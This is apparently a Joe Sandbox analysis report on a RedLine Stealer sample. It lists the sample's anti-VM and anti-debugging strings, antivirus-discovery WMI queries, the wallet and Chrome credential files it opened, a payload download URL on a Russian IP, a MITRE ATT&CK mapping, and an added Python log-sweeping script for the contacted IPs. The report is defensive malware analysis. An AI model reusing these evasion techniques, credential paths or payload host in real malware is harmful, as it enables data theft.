                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843241720.00000000029A0000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1062708597.0000000021540000.00000004.00000001.sdmp | Binary or memory string: VMware
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056932112.00000000022B0000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=http://185.112.83.8/SoftwareCleanedPhilosf.bin
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: vmicvss
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056735991.0000000000862000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843241720.00000000029A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056932112.00000000022B0000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Data Exchange Service
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056735991.0000000000862000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWR[
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1062708597.0000000021540000.00000004.00000001.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareM_N5ZXAGWin32_VideoController4NXN2WLBVideoController120060621000000.000000-0008.1096.1display.infMSBDAD6HFUU4TPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsDZ5DMBMEk
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Service Interface
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmp | Binary or memory string: vmicheartbeat

                        Anti Debugging:

                        Hides threads from debuggers
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Thread information set: HideFromDebugger
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_72891BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028A9B85 rdtsc
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028A924F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028A973D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028AA35F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028A5415 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028A5078 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028A79DC mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028A5908 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028AA146 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028A7C3B LdrInitializeThunk,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Memory allocated: page read and write | page guard
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Process created: C:\Users\user\Desktop\o4XzTr73Ut.exe "C:\Users\user\Desktop\o4XzTr73Ut.exe"
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056764208.0000000000888000.00000004.00000020.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1062708597.0000000021540000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Stealing of Sensitive Information:

                        Yara detected RedLine Stealer
                        Source: Yara match | File source: 12.2.o4XzTr73Ut.exe.1e3e0000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.3.o4XzTr73Ut.exe.89add8.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.o4XzTr73Ut.exe.1e170f6e.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.o4XzTr73Ut.exe.1e170086.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.o4XzTr73Ut.exe.1e170f6e.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.o4XzTr73Ut.exe.20640000.4.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.o4XzTr73Ut.exe.1e3e0ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.o4XzTr73Ut.exe.20640000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.3.o4XzTr73Ut.exe.89add8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.o4XzTr73Ut.exe.1e3e0000.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.o4XzTr73Ut.exe.1e170086.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.o4XzTr73Ut.exe.1e3e0ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000C.00000002.1061972250.0000000020640000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: o4XzTr73Ut.exe PID: 6324, type: MEMORYSTR
                        Source: Yara match | File source: dump.pcap, type: PCAP
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: Yara match | File source: Process Memory Space: o4XzTr73Ut.exe PID: 6324, type: MEMORYSTR

                        Remote Access Functionality:

                        Yara detected RedLine Stealer (same Yara match sources as listed under Stealing of Sensitive Information above)

                        Mitre Att&ck Matrix

                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Valid Accounts | Windows Management Instrumentation 221 | Path Interception | Access Token Manipulation 1 | Masquerading 1 | OS Credential Dumping 1 | Security Software Discovery 541 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
                        Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Process Injection 11 | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 441 | Security Account Manager | Virtualization/Sandbox Evasion 441 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Ingress Tool Transfer 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Access Token Manipulation 1 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 1 | SIM Card Swap | Carrier Billing Fraud |
                        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 11 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 111 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 1 | Cached Domain Credentials | System Information Discovery 126 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

                        Behavior Graph


                        Screenshots


                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        Source | Detection | Scanner | Label
                        o4XzTr73Ut.exe | 7% | Virustotal |
                        o4XzTr73Ut.exe | 23% | ReversingLabs | Win32.Trojan.Shelsy

                        Dropped Files

                        Source | Detection | Scanner | Label
                        C:\Users\user\AppData\Local\Temp\nsb3A92.tmp\System.dll | 3% | Metadefender |
                        C:\Users\user\AppData\Local\Temp\nsb3A92.tmp\System.dll | 0% | ReversingLabs |

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        Source | Detection | Scanner | Label
                        http://service.r | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id12Response | 0% | URL Reputation | safe
                        http://tempuri.org/ | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id2Response | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id21Response | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id9 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id8 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id5 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id4 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id7 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id6 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id19Response | 0% | URL Reputation | safe
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id15Response | 0% | URL Reputation | safe
                        http://support.a | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id6Response | 0% | URL Reputation | safe
                        https://api.ip.sb/ip | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id9Response | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id20 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id21 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id22 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id23 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id24 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id24Response | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id1Response | 0% | URL Reputation | safe
                        http://forms.rea | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id10 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id11 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id12 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id16Response | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id13 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id14 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id15 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id16 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id17 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id18 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id5Response | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id19 | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id10Response | 0% | URL Reputation | safe
                        http://tempuri.org/Entity/Id8Response | 0% | URL Reputation | safe

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id14o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id15o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id16o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Nonceo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id17o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id18o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id5Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id19o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnso4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tempuri.org/Entity/Id10Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renewo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/Entity/Id8Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://support.google.com/chrome/?p=plugin_wmpo4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.google.com/chrome/answer/6258784o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs

                                                                                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.112.83.8 | unknown | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
194.26.229.202 | unknown | Netherlands | 1213 | HEANETIE | true
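The two contacted addresses above are the sample's only network indicators. The following script, an example added by the editor and not part of the Joe Sandbox report, sweeps firewall, Zeek-style and proxy log lines for them and reports each hit with the ASN from the table. The log lines are constructed for illustration; the only values taken from the report are the two IPs and their ASNs.

```python
"""Sweep log lines for the IPs this report lists under "Contacted IPs".

Editor-added example, not code from the Joe Sandbox report. The log lines in
SAMPLE_LOG are constructed; only CONTACTED_IPS comes from the report.
"""
import ipaddress
import re
from typing import List, NamedTuple, Set

# IOCs copied from the report's "Contacted IPs" table.
CONTACTED_IPS = {
    "185.112.83.8": "AS50113 SUPERSERVERSDATACENTER (RU)",
    "194.26.229.202": "AS1213 HEANET (NL)",
}

# Dotted-quad candidates; validity is checked with ipaddress, not the regex.
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


class Hit(NamedTuple):
    line_no: int
    ip: str
    asn: str
    raw: str


def extract_ips(line: str) -> Set[str]:
    """Return every syntactically valid IPv4 address that appears in a log line."""
    found = set()
    for cand in _IPV4.findall(line):
        try:
            ipaddress.IPv4Address(cand)   # rejects octets > 255 such as 999.1.1.1
        except ipaddress.AddressValueError:
            continue
        found.add(cand)
    return found


def find_hits(lines) -> List[Hit]:
    """One Hit per (line, IOC IP) pair, regardless of log format or field position."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in sorted(extract_ips(line) & set(CONTACTED_IPS)):
            hits.append(Hit(n, ip, CONTACTED_IPS[ip], line.rstrip()))
    return hits


# Constructed sample lines (not from the report): a pfSense-style filterlog
# entry, two Zeek conn.log-style TSV rows, a Squid access line and a benign sshd line.
SAMPLE_LOG = [
    "Dec 20 11:02:51 fw filterlog: 5,,,1000000103,em0,match,pass,out,4,0x0,,63,0,0,DF,6,tcp,60,10.0.0.23,185.112.83.8,51234,80,0,S,",
    "1640000571.123\tCbq1Xk3\t10.0.0.23\t51235\t194.26.229.202\t80\ttcp\thttp\t0.52\t312\t47562\tSF",
    "1640000572.001    512 10.0.0.23 TCP_MISS/200 47862 GET http://194.26.229.202/ - HIER_DIRECT/194.26.229.202 application/octet-stream",
    "1640000580.000\tCbq1Xk4\t10.0.0.23\t51236\t142.250.74.78\t443\ttcp\tssl\t1.1\t900\t4200\tSF",
    "Dec 20 11:03:00 fw sshd[1]: Accepted publickey for user from 10.0.0.5 port 2222",
]

if __name__ == "__main__":
    for h in find_hits(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.ip} ({h.asn})")
```

Matching on any dotted quad in the line, rather than on a fixed destination column, is deliberate: the same IOC shows up as a destination in flow logs, inside a URL in proxy logs and as the peer in a HIER_DIRECT field, and a column-bound parser would miss two of those three.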

                                                                                                                                                General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 542642
Start date: 20.12.2021
Start time: 10:58:51
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 8s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: o4XzTr73Ut.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/4@0/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 24.6% (good quality ratio 24.1%)
• Quality average: 88.3%
• Quality standard deviation: 21%
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
• Stop behavior analysis, all processes terminated
                                                                                                                                                Warnings:
                                                                                                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
